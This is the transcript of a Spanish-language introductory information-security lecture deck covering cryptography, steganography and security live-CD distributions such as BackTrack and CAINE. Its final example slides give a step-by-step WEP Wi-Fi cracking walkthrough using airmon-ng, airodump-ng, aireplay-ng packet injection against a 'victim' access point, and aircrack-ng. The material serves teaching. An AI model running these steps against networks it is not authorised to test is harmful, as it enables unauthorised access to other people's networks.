seguridad informatica (live cd) 1.2

30
SEGURIDAD INFORMÁTICA Distribuciones Live-CD Prof. Manuel Mujica [email protected]

Upload: manuel-mujica

Post on 07-Jun-2015

1.096 views

Category:

Education


2 download

DESCRIPTION

Distribuciones Live CD de Seguridad Informática.

TRANSCRIPT

Page 1: Seguridad informatica (live cd) 1.2

SEGURIDAD INFORMÁTICADistribuciones Live-CD

Prof. Manuel [email protected]

Page 2: Seguridad informatica (live cd) 1.2

CONTENIDO

¿Qué es seguridad de la información?

¿Por qué seguridad informática?

Modelos de ataques

Criptografía

Esteganografía

Distribuciones Live-CD

Ejemplos

Page 3: Seguridad informatica (live cd) 1.2

¿Qué es Seguridad de la Información?

Seguridad de información es mucho más que establecer

“firewalls”, aplicar parches para corregir nuevas vulnerabilidades

en el sistema de software, o guardar en la bóveda los “backups”.

Seguridad de información es determinar qué requiere ser protegido

y por qué, de qué debe ser protegido y cómo protegerlo.

Page 4: Seguridad informatica (live cd) 1.2

¿Qué es Seguridad de la Información?

La seguridad de información se caracteriza por la preservación de:

CONFIDENCIALIDAD : La información está protegida de personas no autorizadas.

INTEGRIDAD : La información está como se pretende, sin modificaciones inapropiadas.

DISPONIBILIDAD : Los usuarios tienen acceso a la información y a los activos asociados cuando lo requieran.

Page 5: Seguridad informatica (live cd) 1.2

¿Por qué seguridad informática?

RSA, la División de Seguridad de EMC (NYSE: EMC), anunció

los resultados de la Encuesta mundial sobre seguridad del

consumidor en línea del año 2010: 92% realizó una transacción

bancaria en línea y el 80% realizó una compra en línea.

Un reciente estudio de Federal Deposit Insurance Corporation

(FDIC) indica que durante el último trimestre de 2009, los

ciberdelincuentes robaron más de 150 millones de dólares de

cuentas bancarias de pequeñas y medianas empresas

norteamericanas.

Page 6: Seguridad informatica (live cd) 1.2

Intercepción Modificación

Fabricación Interrupción

E: EmisorR: ReceptorI: Intruso

R EE

EE

R

R R

I I

II

Modelos de Ataques

Page 7: Seguridad informatica (live cd) 1.2

Técnica para ocultar y así proteger informaciónmientras permanece en disco

o mientras está en tránsito

Técnica para ocultar y así proteger informaciónmientras permanece en disco

o mientras está en tránsito

Substitución:Cambia un carácter por uno o varios caracteres

M U R C I E L A G O 0 1 2 3 4 5 6 7 8 9

Hola como estas H967 3909 5ST7S

Criptografía

Page 8: Seguridad informatica (live cd) 1.2

Criptografía

Substitución.

Sustituir un elemento del alfabeto del texto-plano por uno que corres-ponde al alfabeto del texto-cifrado.

El alfabeto latino, que consta de 29 letras: A, B, C, Ch, D, E, F, G, H, I, J, K, L, Ll, M, N, Ñ, O, P, Q, R, S, T, U, V, W, X, Y y Z

Texto-plano: UNIVERSIDADTexto-cifrado: XPLYHUVLGChG

Page 9: Seguridad informatica (live cd) 1.2

Criptografía

Transposición (Permutación). Permuta los caracteres del texto plano.

Texto-plano: ESTE ES UN MENSAJE DE PRUEBA! Texto-cifrado: EUAR SNJU TMEE EEDB ENEA SSP!

E S T E E S U N M E N S A J E D E P R U E B A !

Page 10: Seguridad informatica (live cd) 1.2

Esteganografía

El término "esteganografía" viene del griego stegos, que signi-fica "cubierta", por lo que esteganografía significaría "escritu-ra oculta" o "escritura encubierta".

Así pues, la esteganografía es el conjunto de técnicas que per-miten ocultar o camuflar la información.

Nótese que la criptografía modifica los datos para que no sean legibles, a diferencia de la esteganografía, que simplemente los toma y los oculta entre otros datos.

La esteganografía se utiliza para crear canales encubiertos (covert channels) y marcas de agua (watermarks) para proteger derechos de autor.

Page 11: Seguridad informatica (live cd) 1.2

Esteganografía

Page 12: Seguridad informatica (live cd) 1.2

Distribuciones Live-CD

Page 13: Seguridad informatica (live cd) 1.2

nUbuntu

nUbuntu o Network Ubuntu es un proyecto para tomar la

distribución Ubuntu existente y reconvertirla en un LiveCD e

instalación completa con las herramientas necesarias para realizar

pruebas de penetración en servidores y redes.

La distro incluye algunos de los programas de seguridad para

Linux más usados, tales como Ethereal, nmap, dSniff, y

Ettercap.

Distribución GNU/Linux Fuente: http://www.nubuntu.org

Page 14: Seguridad informatica (live cd) 1.2

CAINE

CAINE (Computer Aided INvestigative Environment) es una

distribución GNU/Linux de origen italiano. Creado como un

proyecto de Ingeniería Forense.

Proporciona:

Fácil interoperabilidad durante todo el análisis (Preservación,

Recolección, Análisis, Reportes).

Amigable entorno gráfico.

Ubuntu como sistema base.

Generación semi-automática de reportes.

Page 15: Seguridad informatica (live cd) 1.2

CAINE

Algunas herramientas incluidas:

Grissom Analyzer Automated Image & Restore (AIR) Guymager Foremost and Scalpel Autopsy 2.20 and TSK 3.0 SFDumper Fundl Stegdetect Ophcrack

CAINE es Open Source Fuente: http://www.caine-live.net/

Page 16: Seguridad informatica (live cd) 1.2

BackTrack

BackTrack es una distribución GNU/Linux en formato Live-CD

pensada y diseñada para la auditoría de seguridad y relacionada

con la seguridad informática en general.

Se deriva de la unión de dos grandes distribuciones orientadas a la

seguridad, el Auditor + WHAX.

Sistema base Ubuntu.

Page 17: Seguridad informatica (live cd) 1.2

BackTrack

Incluye una larga lista de herramientas de seguridad listas para

usar, entre las que destacan numerosos scanners de puertos y

vulnerabilidades, archivos de exploits, sniffers, herramientas

de análisis forense y herramientas para la auditoría Wireless.

Fuente: http://www.backtrack-linux.org/

Page 18: Seguridad informatica (live cd) 1.2

BackTrack

Lista de Herramientas: Recolección de Información (37) Dig, TCPtraceroute, Tctrace, Whoami. Mapeo de Redes (28) Hping, Nmap Identificación de Vulnerabilidades (65) GFI LanGuard, Nikto, SuperScan Penetración (12) OpenSSL-To-Open, Pirana Escalada de Privilegios (48) Etherape, EtterCap, Wireshark Mantenimiento de Acceso (15) Backdoors, CryptCat

Page 19: Seguridad informatica (live cd) 1.2

BackTrack

Lista de Herramientas: Cubrimiento (1) Housekeeping Análisis de redes inalámbricas 802.11 WIFI (25): aircrack-ng, Airsnort Bluetooth (22): Btcrack, hstest VOIP & Análsis telefónico (7) SIPdump, Smap Ingeniería forence (13) Autopsy, DD_Rescue, Foremost, Rootkithunter Ingeniería Inversa (7) GDB GNU Debugger, GDB Console GUI Servicios (1) SNORT

Page 20: Seguridad informatica (live cd) 1.2

Ejemplos: steghide

Adjuntar adj.txt en cvr.jpg:

#steghide embed -cf cvr.jpg -ef adj.txt

Extraer datos adjuntos desde cvr.jpg:

#steghide extract -sf cvr.jpg

Page 21: Seguridad informatica (live cd) 1.2

Ejemplos: wireshark

Page 22: Seguridad informatica (live cd) 1.2

Nikto

Page 23: Seguridad informatica (live cd) 1.2

Nikto

Page 24: Seguridad informatica (live cd) 1.2

Ejemplos: crack wep wifi

Términos:-------------BSSID (mac del router que da la señal)PWR (Poder de señal)CHN (Canal que se encuentra la red)ENCR (Es el tipo de contraseña que tiene la red)ESSID (Nombre de la red inalámbrica).

Page 25: Seguridad informatica (live cd) 1.2

Ejemplos: crack wep wifi

Caso 1: Red sin Filtro de MAC:Caso 1: Red sin Filtro de MAC:

Abrimos una Terminal (consola 1):

1. Ponemos la tarjeta en modo monitor con airmon-ngairmon-ng start [nombre tarjeta inalámbrica] --> wlan0, wlan1, ath0,.

Ejemplo: #airmon-ng start wlan0

En modo monitor, la tarjeta quedara renombrada como: mon0 o mon1

Page 26: Seguridad informatica (live cd) 1.2

Ejemplos: crack wep wifi

Caso 1: Red sin Filtro de MAC:Caso 1: Red sin Filtro de MAC:

2. Escaneamos las redes wireless con airodump-ngairodump-ng [nombre tarjeta inalámbrica] --> mon0, mon1…..

Ejemplo: #airodump-ng mon0

Verificamos el canal (CH) en el que está trabajando la red al cual atacaremos.

Presionamos Ctrl + c para detener el escaneo.

Page 27: Seguridad informatica (live cd) 1.2

Ejemplos: crack wep wifi

Caso 1: Red sin Filtro de MAC:Caso 1: Red sin Filtro de MAC:

Abrimos otra Terminal (consola 2):1. Nos asociamos a la red inalámbrica con aireplay-ngaireplay-ng -1 0 -a [MAC AP Victima] [nombre tarjeta wifi]Ejemplo: #aireplay-ng -1 0 –a 11:22:33:44:55:66 mon0

2. Empezamos a inyectar paquetes a la red asociada con aireplay-ngaireplay-ng -3 -b [MAC AP Victima] [nombre tarjeta wifi]

Ejemplo: #aireplay-ng -3 –b 11:22:33:44:55:66 mon0

Page 28: Seguridad informatica (live cd) 1.2

Ejemplos: crack wep wifi

Caso 1: Red sin Filtro de MAC:Caso 1: Red sin Filtro de MAC:

Abrimos otra Terminal (consola 3):

1. Una vez capturado una gran cantidad de datos (Data) vamos a crackear la red inalámbrica con aircrack-ng

aircrack-ng [filename]-01.cap

Ejemplo:

#aircrack-ng wep-01.cap

Page 29: Seguridad informatica (live cd) 1.2

GRACIAS POR SU ATENCIÓN

"Sólo hay un bien: el conocimiento.

Sólo hay un mal: la ignorancia."

Sócrates.

Page 30: Seguridad informatica (live cd) 1.2

http://pide.wordpress.comhttp://pide.wordpress.comCONTACTO:

email: [email protected] keys:7661B42Ehttp://pgp.cs.uu.nl/

Twitter: @mmujica001

Ubuntu User #4728Linux User #439689

Blog's: http://pide.wordpress.com http://www.ubuntu-ve.org

http://creativecommons.org/licenses/by/3.0/deed.es